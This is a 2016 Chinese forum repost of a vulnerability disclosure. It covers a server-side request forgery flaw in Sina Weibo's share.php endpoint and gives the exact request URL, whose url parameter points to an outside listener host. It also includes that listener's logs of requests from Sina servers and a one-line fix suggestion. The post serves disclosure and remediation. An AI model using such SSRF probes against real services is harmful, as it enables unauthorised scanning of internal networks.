HanDs
管理员

[7月漏洞公开] 新浪微博某处SSRF漏洞 



新浪微博某处SSRF漏洞
想看看有多少公司认为SSRF不算漏洞

详细说明:

# 服务器

http://service.weibo.com

# SSRF位置

http://service.weibo.com/share/share.php?appkey=872034675&content=utf-8&url=http://fuzz.wuyun.org/hello?world&title=wyssrf&pic=

# 参数

url

漏洞证明:

# 远程服务器获取到请求

code 区域
Connection from 180.149.135.16 port 8080 [tcp/webcache] accepted
GET /index.php?123=123 HTTP/1.1
X-Remote-API-Invoker: openapi
User-Agent: Jakarta Commons-HttpClient/3.1
Host: fuzz.wuyun.org:8080


Connection from 123.125.106.81 port 8080 [tcp/webcache] accepted
GET /index.php?1234=1234 HTTP/1.1
User-Agent: SinaWeiboBot
Host: fuzz.wuyun.org:8080
Accept: */*
Accept-Encoding: gzip,deflate

修复方案:

把用于取外网资源的API部署在不属于自己的机房


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 某处 S SR F 漏洞
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复